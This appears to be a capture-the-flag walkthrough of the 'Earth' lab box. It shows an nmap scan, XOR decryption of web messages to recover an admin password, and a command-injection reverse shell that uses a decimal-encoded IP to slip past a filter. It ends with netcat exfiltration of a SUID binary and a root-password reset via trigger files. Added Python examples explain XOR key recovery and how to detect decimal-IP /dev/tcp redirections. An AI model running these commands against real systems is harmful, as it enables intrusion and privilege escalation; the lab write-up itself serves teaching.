Earth
Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience.
nmap -A -vv 10.6.6.12
Starting Nmap 7.93 ( ) at 2022-11-15 10:38 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:38
Completed NSE at 10:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:38
Completed NSE at 10:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:38
Completed NSE at 10:38, 0.00s elapsed
Initiating Ping Scan at 10:38
Scanning 10.6.6.12 [2 ports]
Completed Ping Scan at 10:38, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:38
Completed Parallel DNS resolution of 1 host. at 10:38, 0.00s elapsed
Initiating Connect Scan at 10:38
Scanning earth.cyber.range (10.6.6.12) [1000 ports]
Discovered open port 80/tcp on 10.6.6.12
Discovered open port 443/tcp on 10.6.6.12
Discovered open port 22/tcp on 10.6.6.12
Connect Scan Timing: About 42.40% done; ETC: 10:39 (0:00:42 remaining)
Completed Connect Scan at 10:39, 70.02s elapsed (1000 total ports)
Initiating Service scan at 10:39
Scanning 3 services on earth.cyber.range (10.6.6.12)
Completed Service scan at 10:39, 12.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.6.6.12.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.71s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 1.18s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Nmap scan report for earth.cyber.range (10.6.6.12)
Host is up, received syn-ack (0.71s latency).
Scanned at 2022-11-15 10:38:31 PST for 84s
Not shown: 923 filtered tcp ports (no-response), 74 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKPfhMLiVGrmuwlz9rx/UAEXrre+sPMkyOxfOLyH0ghmVuDOqg/PCx3Mu5Gw1K/mwFxPc662JKeGcwcaQ0j13qs=
|   256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOFcnJNVluex1Y3TV86t7w42tFj8JupDpcN9OhZ878U2
80/tcp  open  http     syn-ack Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Bad Request (400)
443/tcp open  ssl/http syn-ack Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space/localityName=Milky Way
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space/localityName=Milky Way
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa65d21a9e07184b5441da3712f187
| SHA-1: 04db5b29a33f8076f16b8a1b581d6988db257651
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Bad Request (400)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 84.39 seconds

Ports 22, 80 and 443 are open.
Let's try and visit the webpage.
Bad request. Hmm. Looking closer at the nmap scan, I found Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local. So I added 10.6.6.12 earth.local terratest.earth.local to /etc/hosts.
And at the bottom of the page:
Previous Messages:
• 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
Found that there is a robots.txt.
Let's see what testingnotes.txt shows.
Alright, we've got the encryption, which might be useful for the sent messages. We also have a username for an admin page. Let's check out testdata.txt.
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
So I was able to decode this message with CyberChef and XOR. I put the message from testdata.txt in the input field and found that the last message sent on earth.local is the decryption key. And we get a password: earthclimatechangebad4humans. So let's try that in the admin page.
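Why this works, as an added example that is not part of the original write-up: with repeating-key XOR, XORing a ciphertext against its known plaintext returns the key repeated, and that key then opens every other message encrypted under it. The key and messages below are constructed sample values, not the box's data.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix that reproduces `stream` when repeated."""
    for n in range(1, len(stream) + 1):
        if all(b == stream[i % n] for i, b in enumerate(stream)):
            return stream[:n]
    return stream


def recover_key(cipher_hex: str, known_plaintext: bytes) -> bytes:
    """XOR a ciphertext with its known plaintext; the result is the key repeated."""
    ct = bytes.fromhex(cipher_hex)
    n = min(len(ct), len(known_plaintext))
    return shortest_period(xor_bytes(ct[:n], known_plaintext[:n]))


# Constructed sample values (not the box's real key or messages).
SAMPLE_KEY = b"sample-key-01"
KNOWN_TEXT = b"Constructed test data that is published beside the ciphertext."
OTHER_TEXT = b"A second message under the same key."
KNOWN_HEX = xor_bytes(KNOWN_TEXT, SAMPLE_KEY).hex()
OTHER_HEX = xor_bytes(OTHER_TEXT, SAMPLE_KEY).hex()


def demo():
    """Recover the key from the known pair, then read the other message."""
    key = recover_key(KNOWN_HEX, KNOWN_TEXT)
    return key, xor_bytes(bytes.fromhex(OTHER_HEX), key)


if __name__ == "__main__":
    key, other = demo()
    print("recovered key:", key.decode())
    print("other message:", other.decode())
```

The design lesson is that a short XOR key reused across messages gives no confidentiality once any plaintext is published alongside the ciphertext.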
Looks interesting. Maybe we can get a reverse shell with this.
Well, we can't get a reverse shell.
I looked around some and stumbled on /var/earth_web/user_flag.txt.
After some research, I was able to get a shell by converting my IP address to decimal. Wow, who would've thought?

bash -i >& /dev/tcp/167772162/5554 0>&1
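The decimal value in that command is just 10.0.0.2 written as one 32-bit integer, so a filter or log rule that only matches dotted-quad addresses never sees it. An added example (not from the original write-up) of normalising the host part of a /dev/tcp redirection before matching; it handles only the decimal spelling used here, and the sample lines other than the command above are constructed.

```python
import ipaddress
import re

# Bash network redirection target: /dev/tcp/<host>/<port> (or udp).
DEV_NET = re.compile(r"/dev/(tcp|udp)/([^/\s]+)/(\d+)")


def canonical_ipv4(token: str):
    """Dotted-quad for a dotted or decimal-integer IPv4 token, else None."""
    try:
        return str(ipaddress.IPv4Address(token))
    except ValueError:
        pass
    if token.isascii() and token.isdigit() and int(token) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(token)))
    return None  # hostname or a spelling this example does not cover


def scan_line(line: str):
    """Return (proto, raw_host, canonical_host, port, non_canonical) per match."""
    hits = []
    for proto, host, port in DEV_NET.findall(line):
        canon = canonical_ipv4(host)
        non_canonical = canon is not None and canon != host
        hits.append((proto, host, canon, int(port), non_canonical))
    return hits


def flagged(lines):
    """Matches whose address was not written in canonical dotted form."""
    return [hit for line in lines for hit in scan_line(line) if hit[4]]


# Sample command log: line 1 is the command from the write-up, the rest are constructed.
SAMPLE_LINES = [
    "bash -i >& /dev/tcp/167772162/5554 0>&1",
    "cat /var/log/httpd/access_log",
    "exec 3<>/dev/tcp/10.0.0.2/80",
]

if __name__ == "__main__":
    for hit in flagged(SAMPLE_LINES):
        print(hit)
```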
So let's check what has the SUID bit set.

find / -perm -u=s -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

reset_root looks interesting. Let's look into that.

sh-5.1$ ./usr/bin/reset_root
./usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

I wonder what the triggers are? We are gonna have to pull the reset_root file as the machine doesn't have ltrace. Let's set up a netcat listener on the attack machine.
nc -nvlp 5555 > rest
And the Earth machine:
nc -w 3 Yourip 5555 < /usr/bin/reset_root
Once you get the file, chmod +x reset_root and run it with ltrace.

ltrace ./rest
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++

Easy enough. This is just looking for a few folders. So let's go ahead and make those.

sh-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
sh-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
sh-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
sh-5.1$ ./usr/bin/reset_root
./usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
And there you have it. All machines in this series were really fun!
What shall I do next?